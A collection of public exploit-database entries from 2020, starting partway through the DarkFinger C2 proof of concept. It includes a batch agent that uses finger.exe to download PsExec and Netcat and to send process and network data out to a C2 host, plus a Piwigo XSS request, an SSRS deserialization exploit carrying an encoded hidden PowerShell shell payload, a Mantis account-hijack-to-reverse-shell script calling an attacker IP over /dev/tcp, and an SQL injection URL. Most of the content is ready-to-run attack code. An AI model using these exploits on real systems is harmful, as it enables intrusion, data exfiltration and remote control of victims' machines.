print("[+] If Port 79 is blocked, use Windows Netsh Portproxy to reach allowed internet Ports.")
print("[+] Dynamically change the port Darkfinger C2 listens on to port 80:")
print("[+] finger.exe !80!@DarkFinger-Server")
print(" ")
print("[+] DarkFinger-Agent.bat script is the client side component to demonstrate capabilities.")
print("[+] Note: This is just a basic PoC with no type of real security whatsoever.")
print("[+] Disclaimer: Author not responsible for any misuse and or damages by using this software.")
def main(args):
global port
print(BANNER)
if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)
if args.about:
about()
exit()
if args.port:
port = int(args.port)
if args.conf and args.delete:
delete_base64_files()
if args.conf:
create_base64_files(args.conf)
else:
print("[!] Warn: No Base64 files created for download!, add required -c flag.")
exit()
fileppe_fingaz()
def parse_args():
parser.add_argument("-p", "--port", help="C2 Server Port", nargs="?")
parser.add_argument("-c", "--conf", help="Textfile of tools to Base64 encode for download.", nargs="?")
parser.add_argument("-d", "--delete", nargs="?", const="1", help="Delete previously created Base64 encoded files on startup, -c required.")
parser.add_argument("-a", "--about", nargs="?", const="1", help="Darkfinger information")
return parser.parse_args()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
main(parse_args())
[DarkFinger-Agent.bat]
@ECHO OFF
CLS
ECHO [+] Windows TCPIP Finger CMD Agent (c)
ECHO [+] For DarkFinger C2 Server PoC
ECHO [+] By hyp3rlinx
ECHO [+] ApparitionSec
ECHO ===================================
@ECHO.
REM Default download save location.
CD \Users\%username%\Desktop
REM Default download delay time to try an ensure full transfer.
SET DELAY=10
SET FAIL_MSG=[!] Attempted a failed Admin operation ugh :(
net session >nul 2>&1
IF %errorLevel% == 0 (
ECHO [+] Got Admin privileges!.
SET /a Admin = 0
GOTO Init
) ELSE (
ECHO [!] Agent running as non-admin, if you can escalate privs re-run the agent!.
SET /a Admin = 1
SET DARK_PORT=79
GOTO CheckOutbound79
)
:Init
for /f "tokens=1-2 delims=:" %%a in ('ipconfig^|find "IPv4"') do IF NOT DEFINED LOCAL_IP set LOCAL_IP=%%b
SET LOCAL_IP=%LOCAL_IP: =%
ECHO [+] Local IP: %LOCAL_IP%
REM default for non admin as cant set Portproxy.
SET /P DARK_IP="[+] DarkFinger C2 Host/IP: "
SET /P DARK_PORT="[+] DarkFinger C2 Port: "
IF NOT %DARK_PORT%==79 (
ECHO [!] Ports other than 79 typically require a Portproxy.
GOTO AddNetshPortProxy
) ELSE (
GOTO CmdOpt
)
:CheckOutbound79
ECHO [!] Must use the default Port 79 :( good luck.
SET /P CHKPORT="[+] Check if hosts reachable? Y to continue N to abort: "
SET CHKPORT=%CHKPORT: =%
IF /I %CHKPORT% == y (
SET /P DARK_IP="[+] DarkFinger C2 Host/IP: "
cmd /c powershell "$c=New-Object System.Net.Sockets.TCPClient;try{$c.Connect('%DARK_IP%','%DARK_PORT%')}catch{};if(-Not $c.Connected){echo `n'[-] Port 79 unreachable :('}else{$c.Close();echo `n'[-] Port 79 reachable :)'}"
ECHO.
) ELSE (
ECHO [!] Aborting... :(
GOTO Close
)
:CmdOpt
ECHO 1.Download PsExec64
ECHO 2.Download Nc64
ECHO 3.Exfil Tasklist
ECHO 4.Exfil IP Config
ECHO 5.Remove Netsh PortProxy
ECHO 6.Change C2 Server Port - 22 43 53 79 80 443
ECHO 7.Show Current Portproxy
ECHO 8.Change Portproxy
ECHO 9.Delete Portproxy and exit
ECHO 10.Exit Agent
@ECHO.
SET /P doit="Select option: "
IF "%doit%"=="1" GOTO PsExec64
IF "%doit%"=="2" GOTO Nc64
IF "%doit%"=="3" GOTO ExfilTasklist
IF "%doit%"=="4" GOTO ExfilIPConfig
IF "%doit%"=="5" GOTO RemNetShPortProxy
IF "%doit%"=="6" GOTO ChgC2ServerPort
IF "%doit%"=="7" GOTO ShowPortProxy
IF "%doit%"=="8" GOTO ChgPortProxy
IF "%doit%"=="9" GOTO DelProxyNClose
IF "%doit%"=="10" GOTO Close
:ChgPortProxy
IF %Admin% == 0 (
GOTO Init
) ELSE (
ECHO %FAIL_MSG%
@ECHO.
GOTO CmdOpt
)
:PsExec64
SET Tool=PS
ECHO [-] Downloading PsExec64.exe, saving to Desktop as PS.EXE
ECHO [-] Wait...
IF %DARK_PORT%==79 (
SET IP2USE=%DARK_IP%
) ELSE (
SET IP2USE=%LOCAL_IP%
)
call finger ps%DELAY%@%IP2USE% > tmp.txt
GOTO CleanFile
:Nc64
SET Tool=NC
ECHO [-] Downloading Nc64.exe, saving to Desktop as NC.EXE
ECHO [-] Wait...
IF %DARK_PORT%==79 (
SET IP2USE=%DARK_IP%
) ELSE (
SET IP2USE=%LOCAL_IP%
)
call finger nc%DELAY%@%IP2USE% > tmp.txt
GOTO CleanFile
REM remove first two lines of tmp.txt as contains Computer name.
:CleanFile
call cmd /c more +2 tmp.txt > %Tool%.txt
GOTO RemoveTmpFile
:RemoveTmpFile
call cmd /c del %CD%\tmp.txt
GOTO B64Exe
REM Reconstruct executable from the Base64 text-file.
:B64Exe
call certutil -decode %CD%\%Tool%.txt %CD%\%Tool%.EXE 1> nul
@ECHO.
call cmd /c del %CD%\%Tool%.txt
GOTO CmdOpt
:ExfilTasklist
REM uses "." prefix to flag as incoming exfil data.
IF "%DARK_PORT%"=="79" (
SET USE_IP=%DARK_IP%
) ELSE (
SET USE_IP=%LOCAL_IP%
)
cmd /c for /f "tokens=1" %%i in ('tasklist') do finger ."%%i"@%USE_IP%
GOTO CmdOpt
:ExfilIPConfig
REM uses "." prefix to flag as incoming exfil data.
IF "%DARK_PORT%"=="79" (
SET USE_IP=%DARK_IP%
) ELSE (
SET USE_IP=%LOCAL_IP%
)
cmd /c for /f "tokens=*" %%a in ('ipconfig /all') do finger ".%%a"@%USE_IP%
GOTO CmdOpt
:DelProxyNClose
ECHO [!] Removing any previous Portproxy from registry and exiting.
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1
ECHO [!] Exiting...
EXIT /B
:AddNetshPortProxy
SET OK=0
SET /P OK="[!] 1 to Continue:"
IF NOT %OK% EQU 1 (
ECHO [!] Aborted...
@ECHO.
GOTO CmdOpt
)
ECHO [!] Removing any previous Portproxy from registry.
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1
SET LOCAL_FINGER_PORT=79
IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%
IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%
IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
IF %Admin% == 0 netsh interface portproxy show all
GOTO CmdOpt
:RemNetShPortProxy
IF %Admin% == 1 (
ECHO %FAIL_MSG%
@ECHO.
GOTO CmdOpt
) ELSE (
ECHO [!] Removing NetSh PortProxy from registry.
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1
)
IF %DARK_PORT%==79 (
GOTO CmdOpt
) ELSE (
GOTO Init
)
:ShowPortProxy
netsh interface portproxy show all
GOTO CmdOpt
REM Allows agent to change the DarkFinger C2 listener port.
:ChgC2ServerPort
IF %Admin% == 1 (
ECHO %FAIL_MSG%
@ECHO.
GOTO CmdOpt
)
SET /P TMP_PORT="[+] DarkFinger listener Port: "
IF %DARK_PORT%==79 finger !%TMP_PORT%!@%DARK_IP%
IF NOT %DARK_PORT%==79 finger !%TMP_PORT%!@%LOCAL_IP%
SET DARK_PORT=%TMP_PORT%
ECHO [!] Attempted to change the DarkFinger remote Port to %TMP_PORT%.
IF NOT %DARK_PORT%==79 ECHO [!] Non default finger port used, must set a new Portproxy. (
GOTO RemNetShPortProxy
) ELSE (
GOTO CmdOpt
)
:Close
EXIT /B
[PoC Video URL]
https://www.youtube.com/watch?v=cfbwS6zH7ks
[Network Access]
Remote
[Disclosure Timeline]
September 11, 2020 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: Piwigo 2.10.1 - Cross Site Scripting
# POC by: Iridium
# Software Homepage: http://www.piwigo.org
# Version : 2.10.1
# Tested on: Linux & Windows
# Category: webapps
# Google Dork: intext: "Powered by Piwigo"
# CVE : CVE-2020-9467
######## Description ########
Piwigo 2.10.1 has stored XSS via the file parameter in a /ws.php request
because of the pwg.images.setInfo function.
######## Proof of Concept ########
*Request*
POST /piwigo/ws.php?format=json HTTP/1.1
Host: [victim]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101
Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 79
Origin: http://[victim]
Connection: close
Referer: http://[victim]/piwigo/admin.php?page=photos_add§ion=direct
Cookie: pwg_id=08tksticrdkctrvj3gufqqbsnh
method=pwg.categories.add&parent=1&name=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
# Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution
# Google Dork: inurl:ReportViewer.aspx
# Date: 2020-09-17
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft SQL Server 2016 32-bit/x64 SP2 (CU/GDR),
Microsoft SQL Server 2014 32-bit/x64 SP3 (CU/GDR), Microsoft SQL
Server 2012 32-bit/x64 SP2 (QFE)
# Tested on: Windows 2016
# CVE : CVE-2020-0618
# Credit goes to Soroush Dalili
# Source:
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618
# https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
#!/usr/bin/python
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_ntlm import HttpNtlmAuth
import argparse, requests, logging
from bs4 import BeautifulSoup
from sys import argv, exit, stderr, stdout
# to create a payload (default is bindshell on 0.0.0.0:65535):
# .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command..."
class Exploit:
payload = '/wEy4hYAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAqAUvYyBwb3dlcnNoZWxsLmV4ZSAtZXhlYyBieXBhc3MgLW5vbmludGVyYWN0aXZlIC1ub2V4aXQgLXdpbmRvd3N0eWxlIGhpZGRlbiAtYyBpZXgoW3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6ZGVmYXVsdC5nZXRzdHJpbmcoW3N5c3RlbS5jb252ZXJ0XTo6ZnJvbWJhc2U2NHN0cmluZygnSkdFOVczTjVjM1JsYlM1dVpYUXVjMjlqYTJWMGN5NTBZM0JzYVhOMFpXNWxjbDAyTlRVek5Uc2tZUzV6ZEdGeWRDZ3BPeVJqUFNSaExtRmpZMlZ3ZEhSamNHTnNhV1Z1ZENncE95UmxQU1JqTG1kbGRITjBjbVZoYlNncE8xdGllWFJsVzExZEpHYzlNQzR1TmpVMU16VjhKWHN3ZlR0M2FHbHNaU2dvSkdnOUpHVXVjbVZoWkNna1p5d3dMQ1JuTG14bGJtZDBhQ2twTFc1bElEQXBleVJzUFNodVpYY3RiMkpxWldOMElDMTBlWEJsYm1GdFpTQnplWE4wWlcwdWRHVjRkQzVoYzJOcGFXVnVZMjlrYVc1bktTNW5aWFJ6ZEhKcGJtY29KR2NzTUN3a2FDazdKRzQ5S0dsbGVDQWtiQ0F5UGlZeGZHOTFkQzF6ZEhKcGJtY3BPeVJ3UFNJa0tDUnVLU1FvS0hCM1pDa3VjR0YwYUNrK0lqc2tjVDBvVzNSbGVIUXVaVzVqYjJScGJtZGRPanBoYzJOcGFTa3VaMlYwWW5sMFpYTW9KSEFwT3lSbExuZHlhWFJsS0NSeExEQXNKSEV1YkdWdVozUm9LVHNrWlM1bWJIVnphQ2dwZlRza1l5NWpiRzl6WlNncE95UmhMbk4wYjNBb0tUc05DZz09JykpKQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL'
timeout = 0.5
cookies = {}
params = {}
def __init__(self, opt):
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
self.username = '%s\\%s' % (opt.domain, opt.username)
self.target = '%s%s' % (opt.target, opt.path)
self.password = opt.password
self.session = requests.session()
self.redirect = opt.redirect
self.proxies = {
'http': 'http://%s' % opt.proxy,
'https': 'http://%s' % opt.proxy
} if opt.proxy != '' else {}
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko)',
'Content-Type': 'application/x-www-form-urlencoded'
}
self.form = {
'__VIEWSTATE': '',
'NavigationCorrector$PageState': 'NeedsCorrection',
'NavigationCorrector$ViewState': self.payload
}
if opt.debug:
self.debug()
def info(self, message):
stdout.write('[+] %s\n' % str(message))
return self
def error(self, message):
stderr.write('[-] error: %s\n' % str(message))
return self
def doGet(self, url, params=None, values=None):
self.info('sending get request to %s' % url)
try:
return self.session.get(
url=url,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
data=values,
params=params,
auth=HttpNtlmAuth(self.username, self.password)
) if self.username != '\\' else self.session.get(
url=url,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
data=values,
params=params
)
except Exception as err:
self.error(err)
def doPost(self, url, values=None, params=None):
self.info('sending post request to %s' % url)
try:
return self.session.post(
url=url,
data=values,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
params=params,
auth=HttpNtlmAuth(self.username, self.password)
) if self.username != '\\' else self.session.post(
url=url,
data=values,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
params=params
)
except Exception as err:
self.error(err)
def parsePage(self, content):
self.info('parsing form values')
soup = BeautifulSoup(content, 'lxml')
for tag in soup.select('input'):
try:
self.form[tag['name']] = tag['value']
except Exception as err:
self.error(err)
return self
def debug(self):
self.info('debugging enabled')
try:
import http.client as http_client
except ImportError:
import httplib as http_client
http_client.HTTPConnection.debuglevel = 1
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
return self
def getForm(self):
self.info('retrieving form values')
resp = self.doGet(url=self.target)
self.parsePage(content=resp.content)
return self
def exploit(self):
self.info('exploiting target')
resp = self.doPost(url=self.target, params=self.params,
values=self.form)
self.info('received response %d' % resp.status_code)
return self
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='CVE-2020-0618 SQL Server Reporting Services
ViewState Deserialization exploit',
add_help=True
)
try:
parser.add_argument('-target', action='store', help='Target
address: http(s)://target.com ')
parser.add_argument('-username', action='store', default='',
help='Username to use: first.last')
parser.add_argument('-domain', action='store', default='',
help='User domain to use: domain.local')
parser.add_argument('-password', action='store', default='',
help='Password to use: Summer2020')
parser.add_argument('-debug', action='store', default=False,
help='Enable debugging: False')
parser.add_argument('-redirect', action='store',
default=False, help='Follow redirects: False')
parser.add_argument('-proxy', action='store', default='',
help='Enable proxy: 10.10.10.10:8080')
parser.add_argument('-path', action='store',
default='/ReportServer/pages/ReportViewer.aspx', help='Path to page')
if len(argv) == 1:
parser.print_help()
exit(1)
options = parser.parse_args()
Exploit(opt=options).exploit()
except Exception as error:
stderr.write('[-] error in main %s\n' % str(error))
Regards,
West Shepherd
OSWE | OSCE | OSCP | OSWP | CEH | Security+
West Lee Shepherd, LLC
# Exploit Title: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
# Date: 2020-09-17
# Vulnerability Discovery: hyp3rlinx, permanull
# Exploit Author: Nikolas Geiselman
# Vendor Homepage: https://mantisbt.org/
# Software Link: https://mantisbt.org/download.php
# Version: 1.3.0/2.3.0
# Tested on: Ubuntu 16.04/19.10/20.04
# CVE : CVE-2017-7615, CVE-2019-15715
# References:
# https://mantisbt.org/bugs/view.php?id=26091
# https://www.exploit-db.com/exploits/41890
'''
This exploit chains together two CVE's to achieve unauthenticated remote code execution.
The first portion of this exploit resets the Administrator password (CVE-2017-7615) discovered by John Page a.k.a hyp3rlinx, this portion was modified from the original https://www.exploit-db.com/exploits/41890.
The second portion of this exploit takes advantage of a command injection vulnerability (CVE-2019-15715) discovered by 'permanull' (see references).
Usage:
Set netcat listener on port 4444
Send exploit with "python exploit.py"
Example output:
kali@kali:~/Desktop$ python exploit.py
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up
kali@kali:~/Desktop$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.116.135] from (UNKNOWN) [192.168.116.151] 43978
bash: cannot set terminal process group (835): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/mantisbt-2.3.0$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
'''
import requests
from urllib import quote_plus
from base64 import b64encode
from re import split
class exploit():
def __init__(self):
self.s = requests.Session()
self.headers = dict() # Initialize the headers dictionary
self.RHOST = "192.168.116.151" # Victim IP
self.RPORT = "80" # Victim port
self.LHOST = "192.168.116.135" # Attacker IP
self.LPORT = "4444" # Attacker Port
self.verify_user_id = "1" # User id for the target account
self.realname = "administrator" # Username to hijack
self.passwd = "password" # New password after account hijack
self.mantisLoc = "/mantisbt-2.3.0" # Location of mantis in URL
self.ReverseShell = "echo " + b64encode("bash -i >& /dev/tcp/" + self.LHOST + "/" + self.LPORT + " 0>&1") + " | base64 -d | /bin/bash" # Reverse shell payload
def reset_login(self):
# Request # 1: Grab the account update token
url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/verify.php?id=' + self.verify_user_id + '&confirm_hash='
r = self.s.get(url=url,headers=self.headers)
if r.status_code == 404:
print "ERROR: Unable to access password reset page"
exit()
account_update_token = r.text.split('name="account_update_token" value=')[1].split('"')[1]
# Request # 2: Reset the account password
url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/account_update.php'
data = "account_update_token=" + account_update_token + "&password=" + self.passwd + "&verify_user_id=" + self.verify_user_id + "&realname=" + self.realname + "&password_confirm=" + self.passwd
self.headers.update({'Content-Type':'application/x-www-form-urlencoded'})
r = self.s.post(url=url, headers=self.headers, data=data)
if r.status_code == 200:
print "Successfully hijacked account!"
def login(self):
data = "return=index.php&username=" + self.realname + "&password=" + self.passwd + "&secure_session=on"
url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/login.php'
r = self.s.post(url=url,headers=self.headers,data=data)
if "login_page.php" not in r.url:
print "Successfully logged in!"
def CreateConfigOption(self, option, value):
# Get adm_config_set_token
url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/adm_config_report.php'
r = self.s.get(url=url, headers=self.headers)
adm_config_set_token = r.text.split('name="adm_config_set_token" value=')[1].split('"')[1]
# Create config
data = "adm_config_set_token=" + adm_config_set_token + "&user_id=0&original_user_id=0&project_id=0&original_project_id=0&config_option=" + option + "&original_config_option=&type=0&value=" + quote_plus(value) + "&action=create&config_set=Create+Configuration+Option"
url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/adm_config_set.php'
r = self.s.post(url=url, headers=self.headers, data=data)
def TriggerExploit(self):
print "Triggering reverse shell"
url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/workflow_graph_img.php'
try:
r = self.s.get(url=url,headers=self.headers, timeout=3)
except:
pass
def Cleanup(self):
# Delete the config settings that were created to send the reverse shell
print "Cleaning up"
cleaned_up = False
cleanup = requests.Session()
CleanupHeaders = dict()
CleanupHeaders.update({'Content-Type':'application/x-www-form-urlencoded'})
data = "return=index.php&username=" + self.realname + "&password=" + self.passwd + "&secure_session=on"
url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/login.php'
r = cleanup.post(url=url,headers=CleanupHeaders,data=data)
ConfigsToCleanup = ['dot_tool','relationship_graph_enable']
for config in ConfigsToCleanup:
# Get adm_config_delete_token
url = "http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_report.php"
r = cleanup.get(url=url, headers=self.headers)
test = split('<!-- Repeated Info Rows -->',r.text)
# First element of the response list is garbage, delete it
del test[0]
cleanup_dict = dict()
for i in range(len(test)):
if config in test[i]:
cleanup_dict.update({'config_option':config})
cleanup_dict.update({'adm_config_delete_token':test[i].split('name="adm_config_delete_token" value=')[1].split('"')[1]})
cleanup_dict.update({'user_id':test[i].split('name="user_id" value=')[1].split('"')[1]})
cleanup_dict.update({'project_id':test[i].split('name="project_id" value=')[1].split('"')[1]})
# Delete the config
print "Deleting the " + config + " config."
url = "http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_delete.php"
data = "adm_config_delete_token=" + cleanup_dict['adm_config_delete_token'] + "&user_id=" + cleanup_dict['user_id'] + "&project_id=" + cleanup_dict['project_id'] + "&config_option=" + cleanup_dict['config_option'] + "&_confirmed=1"
r = cleanup.post(url=url,headers=CleanupHeaders,data=data)
#Confirm if actually cleaned up
r = cleanup.get(url="http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_report.php", headers=CleanupHeaders, verify=False)
if config in r.text:
cleaned_up = False
else:
cleaned_up = True
if cleaned_up == True:
print "Successfully cleaned up"
else:
print "Unable to clean up configs"
exploit = exploit()
exploit.reset_login()
exploit.login()
exploit.CreateConfigOption(option="relationship_graph_enable",value="1")
exploit.CreateConfigOption(option="dot_tool",value= exploit.ReverseShell + ';')
exploit.TriggerExploit()
exploit.Cleanup()
# Exploit Title: Online Shop Project 1.0 - 'p' SQL Injection
# Date: 2020-09-20
# Exploit Author: Augkim
# Vendor Homepage: https://www.sourcecodester.com/php/14448/online-shop-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-shop-using-php.zip
# Tested on: Apache2
GET
/shop/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: foo.example.org
PoC:
/URL/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-
# Exploit Title: SpamTitan 7.07 - Remote Code Execution (Authenticated)
# Date: 2020-09-18
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/
# Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway
# Version: 7.07
# Tested on: FreeBSD
